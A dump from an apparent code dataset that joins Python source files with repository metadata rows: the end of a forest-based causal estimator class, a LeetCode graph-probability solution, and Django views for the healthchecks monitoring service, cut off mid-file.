The estimator for fitting the response to the features. Must implement
`fit` and `predict` methods. Must be a linear model for correctness when linear_first_stages is ``True``.
model_t: estimator
The estimator for fitting the treatment to the features. Must implement
`fit` and `predict` methods. Must be a linear model for correctness when linear_first_stages is ``True``.
discrete_treatment: bool, optional (default is ``False``)
Whether the treatment values should be treated as categorical, rather than continuous, quantities
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
n_crossfit_splits: int, cross-validation generator or an iterable, optional (Default=2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`cv splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(concat[W, X], T)` to generate the splits. If all
W, X are None, then we call `split(ones((T.shape[0], 1)), T)`.
n_estimators : integer, optional (default=100)
The total number of trees in the forest. The forest consists of a
forest of sqrt(n_estimators) sub-forests, where each sub-forest
contains sqrt(n_estimators) trees.
criterion : string, optional (default="mse")
The function to measure the quality of a split. Supported criteria
are "mse" for the mean squared error, which is equal to variance
reduction as feature selection criterion, and "mae" for the mean
absolute error.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of splitting samples required to split an internal node.
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a fraction and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node.
A split point at any depth will only be considered if it leaves at
least ``min_samples_leaf`` splitting samples in each of the left and
right branches. This may have the effect of smoothing the model,
especially in regression. After construction the tree is also pruned
so that there are at least min_samples_leaf estimation samples on
each leaf.
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a fraction and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the sum total of weights (of all
splitting samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided. After construction
the tree is pruned so that the fraction of the sum total weight
of the estimation samples contained in each leaf node is at
least min_weight_fraction_leaf
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a fraction and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
min_impurity_decrease : float, optional (default=0.)
A node will be split if this split induces a decrease of the impurity
greater than or equal to this value.
The weighted impurity decrease equation is the following::
N_t / N * (impurity - N_t_R / N_t * right_impurity
- N_t_L / N_t * left_impurity)
where ``N`` is the total number of split samples, ``N_t`` is the number of
split samples at the current node, ``N_t_L`` is the number of split samples in the
left child, and ``N_t_R`` is the number of split samples in the right child.
``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
if ``sample_weight`` is passed.
subsample_fr : float or 'auto', optional (default='auto')
The fraction of the half-samples that are used on each tree. Each tree
will be built on subsample_fr * n_samples/2.
If 'auto', then the subsampling fraction is set to::
(n_samples/2)**(1-1/(2*n_features+2))/(n_samples/2)
which is sufficient to guarantee asympotitcally valid inference.
honest : boolean, optional (default=True)
Whether to use honest trees, i.e. half of the samples are used for
creating the tree structure and the other half for the estimation at
the leafs. If False, then all samples are used for both parts.
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel for both `fit` and `predict`.
``None`` means 1 unless in a :func:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
verbose : int, optional (default=0)
Controls the verbosity when fitting and predicting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
"""
def __init__(self,
model_y, model_t,
discrete_treatment=False,
categories='auto',
n_crossfit_splits=2,
n_estimators=100,
criterion="mse",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
max_leaf_nodes=None,
min_impurity_decrease=0.,
subsample_fr='auto',
honest=True,
n_jobs=None,
verbose=0,
random_state=None):
model_final = SubsampledHonestForest(n_estimators=n_estimators,
criterion=criterion,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
min_impurity_decrease=min_impurity_decrease,
subsample_fr=subsample_fr,
honest=honest,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose)
super().__init__(model_y=model_y, model_t=model_t,
model_final=model_final, featurizer=None,
discrete_treatment=discrete_treatment,
categories=categories,
n_splits=n_crossfit_splits, random_state=random_state)
def _get_inference_options(self):
# add statsmodels to parent's options
options = super()._get_inference_options()
options.update(blb=GenericSingleTreatmentModelFinalInference)
return options
def fit(self, Y, T, X=None, W=None, sample_weight=None, sample_var=None, inference=None):
"""
Estimate the counterfactual model from data, i.e. estimates functions τ(·,·,·), ∂τ(·,·).
Parameters
----------
Y: (n × d_y) matrix or vector of length n
Outcomes for each sample
T: (n × dₜ) matrix or vector of length n
Treatments for each sample
X: optional (n × dₓ) matrix
Features for each sample
W: optional (n × d_w) matrix
Controls for each sample
sample_weight: optional (n,) vector
Weights for each row
sample_var: optional (n, n_y) vector
Variance of sample, in case it corresponds to summary of many samples. Currently
not in use by this method (as inference method does not require sample variance info).
inference: string, `Inference` instance, or None
Method for performing inference. This estimator supports 'bootstrap'
(or an instance of :class:`.BootstrapInference`) and 'blb'
(for Bootstrap-of-Little-Bags based inference)
Returns
-------
self
"""
return super().fit(Y, T, X=X, W=W, sample_weight=sample_weight, sample_var=None, inference=inference)
| 48.609489 | 118 | 0.645732 |
acf6d6474e7f1dfb882b674b5691cf4133a1cd2c | 1,036 | py | Python | 1377 Frog Position After T Seconds.py | MdAbedin/leetcode | e835f2e716ea5fe87f30b84801ede9bc023749e7 | [
"MIT"
] | 4 | 2020-09-11T02:36:11.000Z | 2021-09-29T20:47:11.000Z | 1377 Frog Position After T Seconds.py | MdAbedin/leetcode | e835f2e716ea5fe87f30b84801ede9bc023749e7 | [
"MIT"
] | 3 | 2020-09-10T03:51:42.000Z | 2021-09-25T01:41:57.000Z | 1377 Frog Position After T Seconds.py | MdAbedin/leetcode | e835f2e716ea5fe87f30b84801ede9bc023749e7 | [
"MIT"
] | 6 | 2020-09-10T03:46:15.000Z | 2021-09-25T01:24:48.000Z | class Solution:
def frogPosition(self, n: int, edges: List[List[int]], t: int, target: int) -> float:
neighbors = defaultdict(list)
probs = dict()
for edge in edges:
a,b = edge
neighbors[a].append(b)
neighbors[b].append(a)
bfs = deque([1])
probs[1] = 1
while bfs and t:
for i in range(len(bfs)):
cur = bfs.popleft()
num_unvisited_neighbors = 0
for neighbor in neighbors[cur]:
if neighbor not in probs:
num_unvisited_neighbors += 1
bfs.append(neighbor)
for neighbor in neighbors[cur]:
if neighbor not in probs:
probs[neighbor] = probs[cur]/num_unvisited_neighbors
if num_unvisited_neighbors:
probs[cur] = 0
t -= 1
return probs[target] if target in probs else 0
| 30.470588 | 89 | 0.470077 |
acf6d70f95073448da1fddd0defc6eec57736180 | 62,527 | py | Python | hc/front/views.py | ArpitKotecha/healthchecks | 44a677f327ac5da162eb9cbc0214c396bb2bf77e | [
"BSD-3-Clause"
] | null | null | null | hc/front/views.py | ArpitKotecha/healthchecks | 44a677f327ac5da162eb9cbc0214c396bb2bf77e | [
"BSD-3-Clause"
] | null | null | null | hc/front/views.py | ArpitKotecha/healthchecks | 44a677f327ac5da162eb9cbc0214c396bb2bf77e | [
"BSD-3-Clause"
] | null | null | null | from datetime import datetime, timedelta as td
import json
import os
import re
from secrets import token_urlsafe
from urllib.parse import urlencode
from cron_descriptor import ExpressionDescriptor
from croniter import croniter
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.core import signing
from django.core.exceptions import PermissionDenied
from django.db.models import Count
from django.http import (
Http404,
HttpResponse,
HttpResponseBadRequest,
HttpResponseForbidden,
JsonResponse,
)
from django.shortcuts import get_object_or_404, redirect, render
from django.template.loader import get_template, render_to_string
from django.urls import reverse
from django.utils import timezone
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from hc.accounts.models import Project, Member
from hc.api.models import (
DEFAULT_GRACE,
DEFAULT_TIMEOUT,
MAX_DELTA,
Channel,
Check,
Ping,
Notification,
)
from hc.api.transports import Telegram
from hc.front.decorators import require_setting
from hc.front import forms
from hc.front.schemas import telegram_callback
from hc.front.templatetags.hc_extras import (
num_down_title,
down_title,
sortchecks,
site_hostname,
site_scheme,
)
from hc.lib import jsonschema
from hc.lib.badges import get_badge_url
import pytz
from pytz.exceptions import UnknownTimeZoneError
import requests
VALID_SORT_VALUES = ("name", "-name", "last_ping", "-last_ping", "created")
STATUS_TEXT_TMPL = get_template("front/log_status_text.html")
LAST_PING_TMPL = get_template("front/last_ping_cell.html")
EVENTS_TMPL = get_template("front/details_events.html")
DOWNTIMES_TMPL = get_template("front/details_downtimes.html")
def _tags_statuses(checks):
tags, down, grace, num_down = {}, {}, {}, 0
for check in checks:
status = check.get_status()
if status == "down":
num_down += 1
for tag in check.tags_list():
down[tag] = "down"
elif status == "grace":
for tag in check.tags_list():
grace[tag] = "grace"
else:
for tag in check.tags_list():
tags[tag] = "up"
tags.update(grace)
tags.update(down)
return tags, num_down
def _get_check_for_user(request, code):
""" Return specified check if current user has access to it. """
assert request.user.is_authenticated
check = get_object_or_404(Check.objects.select_related("project"), code=code)
if request.user.is_superuser:
return check, True
if request.user.id == check.project.owner_id:
return check, True
membership = get_object_or_404(Member, project=check.project, user=request.user)
return check, membership.rw
def _get_rw_check_for_user(request, code):
check, rw = _get_check_for_user(request, code)
if not rw:
raise PermissionDenied
return check
def _get_channel_for_user(request, code):
""" Return specified channel if current user has access to it. """
assert request.user.is_authenticated
channel = get_object_or_404(Channel.objects.select_related("project"), code=code)
if request.user.is_superuser:
return channel, True
if request.user.id == channel.project.owner_id:
return channel, True
membership = get_object_or_404(Member, project=channel.project, user=request.user)
return channel, membership.rw
def _get_rw_channel_for_user(request, code):
channel, rw = _get_channel_for_user(request, code)
if not rw:
raise PermissionDenied
return channel
def _get_project_for_user(request, project_code):
""" Check access, return (project, rw) tuple. """
project = get_object_or_404(Project, code=project_code)
if request.user.is_superuser:
return project, True
if request.user.id == project.owner_id:
return project, True
membership = get_object_or_404(Member, project=project, user=request.user)
return project, membership.rw
def _get_rw_project_for_user(request, project_code):
""" Check access, return (project, rw) tuple. """
project, rw = _get_project_for_user(request, project_code)
if not rw:
raise PermissionDenied
return project
def _refresh_last_active_date(profile):
""" Update last_active_date if it is more than a day old. """
now = timezone.now()
if profile.last_active_date is None or (now - profile.last_active_date).days > 0:
profile.last_active_date = now
profile.save()
@login_required
def my_checks(request, code):
_refresh_last_active_date(request.profile)
project, rw = _get_project_for_user(request, code)
if request.GET.get("sort") in VALID_SORT_VALUES:
request.profile.sort = request.GET["sort"]
request.profile.save()
if request.session.get("last_project_id") != project.id:
request.session["last_project_id"] = project.id
q = Check.objects.filter(project=project)
checks = list(q.prefetch_related("channel_set"))
sortchecks(checks, request.profile.sort)
tags_statuses, num_down = _tags_statuses(checks)
pairs = list(tags_statuses.items())
pairs.sort(key=lambda pair: pair[0].lower())
channels = Channel.objects.filter(project=project)
channels = list(channels.order_by("created"))
hidden_checks = set()
# Hide checks that don't match selected tags:
selected_tags = set(request.GET.getlist("tag", []))
if selected_tags:
for check in checks:
if not selected_tags.issubset(check.tags_list()):
hidden_checks.add(check)
# Hide checks that don't match the search string:
search = request.GET.get("search", "")
if search:
for check in checks:
search_key = "%s\n%s" % (check.name.lower(), check.code)
if search not in search_key:
hidden_checks.add(check)
# Do we need to show the "Last Duration" header?
show_last_duration = False
for check in checks:
if check.clamped_last_duration():
show_last_duration = True
break
ctx = {
"page": "checks",
"rw": rw,
"checks": checks,
"channels": channels,
"num_down": num_down,
"tags": pairs,
"ping_endpoint": settings.PING_ENDPOINT,
"timezones": pytz.all_timezones,
"project": project,
"num_available": project.num_checks_available(),
"sort": request.profile.sort,
"selected_tags": selected_tags,
"search": search,
"hidden_checks": hidden_checks,
"show_last_duration": show_last_duration,
}
return render(request, "front/my_checks.html", ctx)
@login_required
def status(request, code):
_get_project_for_user(request, code)
checks = list(Check.objects.filter(project__code=code))
details = []
for check in checks:
ctx = {"check": check}
details.append(
{
"code": str(check.code),
"status": check.get_status(),
"last_ping": LAST_PING_TMPL.render(ctx),
"started": check.last_start is not None,
}
)
tags_statuses, num_down = _tags_statuses(checks)
return JsonResponse(
{"details": details, "tags": tags_statuses, "title": num_down_title(num_down)}
)
@login_required
@require_POST
def switch_channel(request, code, channel_code):
check = _get_rw_check_for_user(request, code)
channel = get_object_or_404(Channel, code=channel_code)
if channel.project_id != check.project_id:
return HttpResponseBadRequest()
if request.POST.get("state") == "on":
channel.checks.add(check)
else:
channel.checks.remove(check)
return HttpResponse()
def index(request):
if request.user.is_authenticated:
projects = list(request.profile.projects())
ctx = {
"page": "projects",
"projects": projects,
"last_project_id": request.session.get("last_project_id"),
}
return render(request, "front/projects.html", ctx)
check = Check()
ctx = {
"page": "welcome",
"check": check,
"ping_url": check.url(),
"enable_apprise": settings.APPRISE_ENABLED is True,
"enable_call": settings.TWILIO_AUTH is not None,
"enable_discord": settings.DISCORD_CLIENT_ID is not None,
"enable_linenotify": settings.LINENOTIFY_CLIENT_ID is not None,
"enable_matrix": settings.MATRIX_ACCESS_TOKEN is not None,
"enable_mattermost": settings.MATTERMOST_ENABLED is True,
"enable_msteams": settings.MSTEAMS_ENABLED is True,
"enable_opsgenie": settings.OPSGENIE_ENABLED is True,
"enable_pagertree": settings.PAGERTREE_ENABLED is True,
"enable_pd": settings.PD_ENABLED is True,
"enable_pdc": settings.PD_VENDOR_KEY is not None,
"enable_prometheus": settings.PROMETHEUS_ENABLED is True,
"enable_pushbullet": settings.PUSHBULLET_CLIENT_ID is not None,
"enable_pushover": settings.PUSHOVER_API_TOKEN is not None,
"enable_shell": settings.SHELL_ENABLED is True,
"enable_signal": settings.SIGNAL_CLI_ENABLED is True,
"enable_slack": settings.SLACK_ENABLED is True,
"enable_slack_btn": settings.SLACK_CLIENT_ID is not None,
"enable_sms": settings.TWILIO_AUTH is not None,
"enable_spike": settings.SPIKE_ENABLED is True,
"enable_telegram": settings.TELEGRAM_TOKEN is not None,
"enable_trello": settings.TRELLO_APP_KEY is not None,
"enable_victorops": settings.VICTOROPS_ENABLED is True,
"enable_webhooks": settings.WEBHOOKS_ENABLED is True,
"enable_whatsapp": settings.TWILIO_USE_WHATSAPP,
"enable_zulip": settings.ZULIP_ENABLED is True,
"registration_open": settings.REGISTRATION_OPEN,
}
return render(request, "front/welcome.html", ctx)
def dashboard(request):
return render(request, "front/dashboard.html", {})
def serve_doc(request, doc="introduction"):
# Filenames in /templates/docs/ consist of lowercase letters and underscores,
# -- make sure we don't accept anything else
if not re.match(r"^[a-z_]+$", doc):
raise Http404("not found")
path = os.path.join(settings.BASE_DIR, "templates/docs", doc + ".html")
if not os.path.exists(path):
raise Http404("not found")
content = open(path, "r", encoding="utf-8").read()
if not doc.startswith("self_hosted"):
replaces = {
"{{ default_timeout }}": str(int(DEFAULT_TIMEOUT.total_seconds())),
"{{ default_grace }}": str(int(DEFAULT_GRACE.total_seconds())),
"SITE_NAME": settings.SITE_NAME,
"SITE_ROOT": settings.SITE_ROOT,
"SITE_HOSTNAME": site_hostname(),
"SITE_SCHEME": site_scheme(),
"PING_ENDPOINT": settings.PING_ENDPOINT,
"PING_URL": settings.PING_ENDPOINT + "your-uuid-here",
"IMG_URL": os.path.join(settings.STATIC_URL, "img/docs"),
}
for placeholder, value in replaces.items():
content = content.replace(placeholder, value)
ctx = {
"page": "docs",
"section": doc,
"content": content,
"first_line": content.split("\n")[0],
}
return render(request, "front/docs_single.html", ctx)
def docs_cron(request):
return render(request, "front/docs_cron.html", {})
@require_POST
@login_required
def add_check(request, code):
project = _get_rw_project_for_user(request, code)
if project.num_checks_available() <= 0:
return HttpResponseBadRequest()
check = Check(project=project)
check.save()
check.assign_all_channels()
url = reverse("hc-details", args=[check.code])
return redirect(url + "?new")
@require_POST
@login_required
def update_name(request, code):
check = _get_rw_check_for_user(request, code)
form = forms.NameTagsForm(request.POST)
if form.is_valid():
check.name = form.cleaned_data["name"]
check.tags = form.cleaned_data["tags"]
check.desc = form.cleaned_data["desc"]
check.save()
if "/details/" in request.META.get("HTTP_REFERER", ""):
return redirect("hc-details", code)
return redirect("hc-checks", check.project.code)
@require_POST
@login_required
def filtering_rules(request, code):
check = _get_rw_check_for_user(request, code)
form = forms.FilteringRulesForm(request.POST)
if form.is_valid():
check.subject = form.cleaned_data["subject"]
check.subject_fail = form.cleaned_data["subject_fail"]
check.methods = form.cleaned_data["methods"]
check.manual_resume = form.cleaned_data["manual_resume"]
check.save()
return redirect("hc-details", code)
@require_POST
@login_required
def update_timeout(request, code):
check = _get_rw_check_for_user(request, code)
kind = request.POST.get("kind")
if kind == "simple":
form = forms.TimeoutForm(request.POST)
if not form.is_valid():
return HttpResponseBadRequest()
check.kind = "simple"
check.timeout = form.cleaned_data["timeout"]
check.grace = form.cleaned_data["grace"]
elif kind == "cron":
form = forms.CronForm(request.POST)
if not form.is_valid():
return HttpResponseBadRequest()
check.kind = "cron"
check.schedule = form.cleaned_data["schedule"]
check.tz = form.cleaned_data["tz"]
check.grace = td(minutes=form.cleaned_data["grace"])
check.alert_after = check.going_down_after()
if check.status == "up" and check.alert_after < timezone.now():
# Checks can flip from "up" to "down" state as a result of changing check's
# schedule. We don't want to send notifications when changing schedule
# interactively in the web UI. So we update the `alert_after` and `status`
# fields here the same way as `sendalerts` would do, but without sending
# an actual alert:
check.alert_after = None
check.status = "down"
check.save()
if "/details/" in request.META.get("HTTP_REFERER", ""):
return redirect("hc-details", code)
return redirect("hc-checks", check.project.code)
@require_POST
def cron_preview(request):
schedule = request.POST.get("schedule", "")
tz = request.POST.get("tz")
ctx = {"tz": tz, "dates": []}
try:
zone = pytz.timezone(tz)
now_local = timezone.localtime(timezone.now(), zone)
if len(schedule.split()) != 5:
raise ValueError()
it = croniter(schedule, now_local)
for i in range(0, 6):
ctx["dates"].append(it.get_next(datetime))
except UnknownTimeZoneError:
ctx["bad_tz"] = True
except:
ctx["bad_schedule"] = True
if ctx["dates"]:
try:
descriptor = ExpressionDescriptor(schedule, use_24hour_time_format=True)
ctx["desc"] = descriptor.get_description()
except:
# We assume the schedule is valid if croniter accepts it.
# If cron-descriptor throws an exception, don't show the description
# to the user.
pass
return render(request, "front/cron_preview.html", ctx)
@login_required
def ping_details(request, code, n=None):
check, rw = _get_check_for_user(request, code)
q = Ping.objects.filter(owner=check)
if n:
q = q.filter(n=n)
try:
ping = q.latest("created")
except Ping.DoesNotExist:
return render(request, "front/ping_details_not_found.html")
ctx = {"check": check, "ping": ping}
return render(request, "front/ping_details.html", ctx)
@require_POST
@login_required
def pause(request, code):
check = _get_rw_check_for_user(request, code)
check.status = "paused"
check.last_start = None
check.alert_after = None
check.save()
# Don't redirect after an AJAX request:
if request.META.get("HTTP_X_REQUESTED_WITH") == "XMLHttpRequest":
return HttpResponse()
return redirect("hc-details", code)
@require_POST
@login_required
def resume(request, code):
check = _get_rw_check_for_user(request, code)
check.status = "new"
check.last_start = None
check.last_ping = None
check.alert_after = None
check.save()
return redirect("hc-details", code)
@require_POST
@login_required
def remove_check(request, code):
check = _get_rw_check_for_user(request, code)
project = check.project
check.delete()
return redirect("hc-checks", project.code)
def _get_events(check, limit):
pings = Ping.objects.filter(owner=check).order_by("-id")[:limit]
pings = list(pings)
prev = None
for ping in reversed(pings):
if ping.kind != "start" and prev and prev.kind == "start":
delta = ping.created - prev.created
if delta < MAX_DELTA:
setattr(ping, "delta", delta)
prev = ping
alerts = []
if len(pings):
cutoff = pings[-1].created
alerts = Notification.objects.select_related("channel").filter(
owner=check, check_status="down", created__gt=cutoff
)
events = pings + list(alerts)
events.sort(key=lambda el: el.created, reverse=True)
return events
@login_required
def log(request, code):
check, rw = _get_check_for_user(request, code)
limit = check.project.owner_profile.ping_log_limit
ctx = {
"project": check.project,
"check": check,
"events": _get_events(check, limit),
"limit": limit,
"show_limit_notice": check.n_pings > limit and settings.USE_PAYMENTS,
}
return render(request, "front/log.html", ctx)
@login_required
def details(request, code):
_refresh_last_active_date(request.profile)
check, rw = _get_check_for_user(request, code)
channels = Channel.objects.filter(project=check.project)
channels = list(channels.order_by("created"))
all_tags = set()
q = Check.objects.filter(project=check.project).exclude(tags="")
for tags in q.values_list("tags", flat=True):
all_tags.update(tags.split(" "))
ctx = {
"page": "details",
"project": check.project,
"check": check,
"rw": rw,
"channels": channels,
"enabled_channels": list(check.channel_set.all()),
"timezones": pytz.all_timezones,
"downtimes": check.downtimes(months=3),
"is_new": "new" in request.GET,
"is_copied": "copied" in request.GET,
"all_tags": " ".join(sorted(all_tags)),
}
return render(request, "front/details.html", ctx)
@login_required
def transfer(request, code):
check = _get_rw_check_for_user(request, code)
if request.method == "POST":
target_project = _get_rw_project_for_user(request, request.POST["project"])
if target_project.num_checks_available() <= 0:
return HttpResponseBadRequest()
check.project = target_project
check.save()
check.assign_all_channels()
messages.success(request, "Check transferred successfully!")
return redirect("hc-details", code)
ctx = {"check": check}
return render(request, "front/transfer_modal.html", ctx)
@require_POST
@login_required
def copy(request, code):
check = _get_rw_check_for_user(request, code)
if check.project.num_checks_available() <= 0:
return HttpResponseBadRequest()
new_name = check.name + " (copy)"
# Make sure we don't exceed the 100 character db field limit:
if len(new_name) > 100:
new_name = check.name[:90] + "... (copy)"
copied = Check(project=check.project)
copied.name = new_name
copied.desc, copied.tags = check.desc, check.tags
copied.subject, copied.subject_fail = check.subject, check.subject_fail
copied.methods = check.methods
copied.manual_resume = check.manual_resume
copied.kind = check.kind
copied.timeout, copied.grace = check.timeout, check.grace
copied.schedule, copied.tz = check.schedule, check.tz
copied.save()
copied.channel_set.add(*check.channel_set.all())
url = reverse("hc-details", args=[copied.code])
return redirect(url + "?copied")
@login_required
def status_single(request, code):
check, rw = _get_check_for_user(request, code)
status = check.get_status()
events = _get_events(check, 20)
updated = "1"
if len(events):
updated = str(events[0].created.timestamp())
doc = {
"status": status,
"status_text": STATUS_TEXT_TMPL.render({"check": check, "rw": rw}),
"title": down_title(check),
"updated": updated,
}
if updated != request.GET.get("u"):
doc["events"] = EVENTS_TMPL.render({"check": check, "events": events})
doc["downtimes"] = DOWNTIMES_TMPL.render({"downtimes": check.downtimes(3)})
return JsonResponse(doc)
@login_required
def badges(request, code):
project, rw = _get_project_for_user(request, code)
tags = set()
for check in Check.objects.filter(project=project):
tags.update(check.tags_list())
sorted_tags = sorted(tags, key=lambda s: s.lower())
sorted_tags.append("*") # For the "overall status" badge
key = project.badge_key
urls = []
for tag in sorted_tags:
urls.append(
{
"tag": tag,
"svg": get_badge_url(key, tag),
"svg3": get_badge_url(key, tag, with_late=True),
"json": get_badge_url(key, tag, fmt="json"),
"json3": get_badge_url(key, tag, fmt="json", with_late=True),
"shields": get_badge_url(key, tag, fmt="shields"),
"shields3": get_badge_url(key, tag, fmt="shields", with_late=True),
}
)
ctx = {
"have_tags": len(urls) > 1,
"page": "badges",
"project": project,
"badges": urls,
}
return render(request, "front/badges.html", ctx)
@login_required
def channels(request, code):
project, rw = _get_project_for_user(request, code)
if request.method == "POST":
if not rw:
return HttpResponseForbidden()
code = request.POST["channel"]
try:
channel = Channel.objects.get(code=code)
except Channel.DoesNotExist:
return HttpResponseBadRequest()
if channel.project_id != project.id:
return HttpResponseForbidden()
new_checks = []
for key in request.POST:
if key.startswith("check-"):
code = key[6:]
try:
check = Check.objects.get(code=code)
except Check.DoesNotExist:
return HttpResponseBadRequest()
if check.project_id != project.id:
return HttpResponseForbidden()
new_checks.append(check)
channel.checks.set(new_checks)
return redirect("hc-channels", project.code)
channels = Channel.objects.filter(project=project)
channels = channels.order_by("created")
channels = channels.annotate(n_checks=Count("checks"))
ctx = {
"page": "channels",
"rw": rw,
"project": project,
"profile": project.owner_profile,
"channels": channels,
"enable_apprise": settings.APPRISE_ENABLED is True,
"enable_call": settings.TWILIO_AUTH is not None,
"enable_discord": settings.DISCORD_CLIENT_ID is not None,
"enable_linenotify": settings.LINENOTIFY_CLIENT_ID is not None,
"enable_matrix": settings.MATRIX_ACCESS_TOKEN is not None,
"enable_mattermost": settings.MATTERMOST_ENABLED is True,
"enable_msteams": settings.MSTEAMS_ENABLED is True,
"enable_opsgenie": settings.OPSGENIE_ENABLED is True,
"enable_pagertree": settings.PAGERTREE_ENABLED is True,
"enable_pd": settings.PD_ENABLED is True,
"enable_pdc": settings.PD_VENDOR_KEY is not None,
"enable_prometheus": settings.PROMETHEUS_ENABLED is True,
"enable_pushbullet": settings.PUSHBULLET_CLIENT_ID is not None,
"enable_pushover": settings.PUSHOVER_API_TOKEN is not None,
"enable_shell": settings.SHELL_ENABLED is True,
"enable_signal": settings.SIGNAL_CLI_ENABLED is True,
"enable_slack": settings.SLACK_ENABLED is True,
"enable_slack_btn": settings.SLACK_CLIENT_ID is not None,
"enable_sms": settings.TWILIO_AUTH is not None,
"enable_spike": settings.SPIKE_ENABLED is True,
"enable_telegram": settings.TELEGRAM_TOKEN is not None,
"enable_trello": settings.TRELLO_APP_KEY is not None,
"enable_victorops": settings.VICTOROPS_ENABLED is True,
"enable_webhooks": settings.WEBHOOKS_ENABLED is True,
"enable_whatsapp": settings.TWILIO_USE_WHATSAPP,
"enable_zulip": settings.ZULIP_ENABLED is True,
"use_payments": settings.USE_PAYMENTS,
}
return render(request, "front/channels.html", ctx)
@login_required
def channel_checks(request, code):
channel = _get_rw_channel_for_user(request, code)
assigned = set(channel.checks.values_list("code", flat=True).distinct())
checks = Check.objects.filter(project=channel.project).order_by("created")
ctx = {"checks": checks, "assigned": assigned, "channel": channel}
return render(request, "front/channel_checks.html", ctx)
@require_POST
@login_required
def update_channel_name(request, code):
channel = _get_rw_channel_for_user(request, code)
form = forms.ChannelNameForm(request.POST)
if form.is_valid():
channel.name = form.cleaned_data["name"]
channel.save()
return redirect("hc-channels", channel.project.code)
def verify_email(request, code, token):
channel = get_object_or_404(Channel, code=code)
if channel.make_token() == token:
channel.email_verified = True
channel.save()
return render(request, "front/verify_email_success.html")
return render(request, "bad_link.html")
@csrf_exempt
def unsubscribe_email(request, code, signed_token):
# Some email servers open links in emails to check for malicious content.
# To work around this, on GET requests we serve a confirmation form.
# If the signature is at least 5 minutes old, we also include JS code to
# auto-submit the form.
ctx = {}
if ":" in signed_token:
signer = signing.TimestampSigner(salt="alerts")
# First, check the signature without looking at the timestamp:
try:
token = signer.unsign(signed_token)
except signing.BadSignature:
return render(request, "bad_link.html")
# Check if timestamp is older than 5 minutes:
try:
signer.unsign(signed_token, max_age=300)
except signing.SignatureExpired:
ctx["autosubmit"] = True
else:
token = signed_token
channel = get_object_or_404(Channel, code=code, kind="email")
if channel.make_token() != token:
return render(request, "bad_link.html")
if request.method != "POST":
return render(request, "accounts/unsubscribe_submit.html", ctx)
channel.delete()
return render(request, "front/unsubscribe_success.html")
@require_POST
@login_required
def send_test_notification(request, code):
channel, rw = _get_channel_for_user(request, code)
dummy = Check(name="TEST", status="down", project=channel.project)
dummy.last_ping = timezone.now() - td(days=1)
dummy.n_pings = 42
if channel.kind == "webhook" and not channel.url_down:
if channel.url_up:
# If we don't have url_down, but do have have url_up then
# send "TEST is UP" notification instead:
dummy.status = "up"
# Delete all older test notifications for this channel
Notification.objects.filter(channel=channel, owner=None).delete()
# Send the test notification
error = channel.notify(dummy, is_test=True)
if error:
messages.warning(request, "Could not send a test notification. %s" % error)
else:
messages.success(request, "Test notification sent!")
return redirect("hc-channels", channel.project.code)
@require_POST
@login_required
def remove_channel(request, code):
channel = _get_rw_channel_for_user(request, code)
project = channel.project
channel.delete()
return redirect("hc-channels", project.code)
@login_required
def add_email(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddEmailForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="email")
channel.value = json.dumps(
{
"value": form.cleaned_data["value"],
"up": form.cleaned_data["up"],
"down": form.cleaned_data["down"],
}
)
channel.save()
channel.assign_all_checks()
is_own_email = form.cleaned_data["value"] == request.user.email
if is_own_email or not settings.EMAIL_USE_VERIFICATION:
# If user is subscribing *their own* address
# we can skip the verification step.
# Additionally, in self-hosted setting, administator has the
# option to disable the email verification step altogether.
channel.email_verified = True
channel.save()
else:
channel.send_verify_link()
return redirect("hc-channels", project.code)
else:
form = forms.AddEmailForm()
ctx = {
"page": "channels",
"project": project,
"use_verification": settings.EMAIL_USE_VERIFICATION,
"form": form,
}
return render(request, "integrations/add_email.html", ctx)
@require_setting("WEBHOOKS_ENABLED")
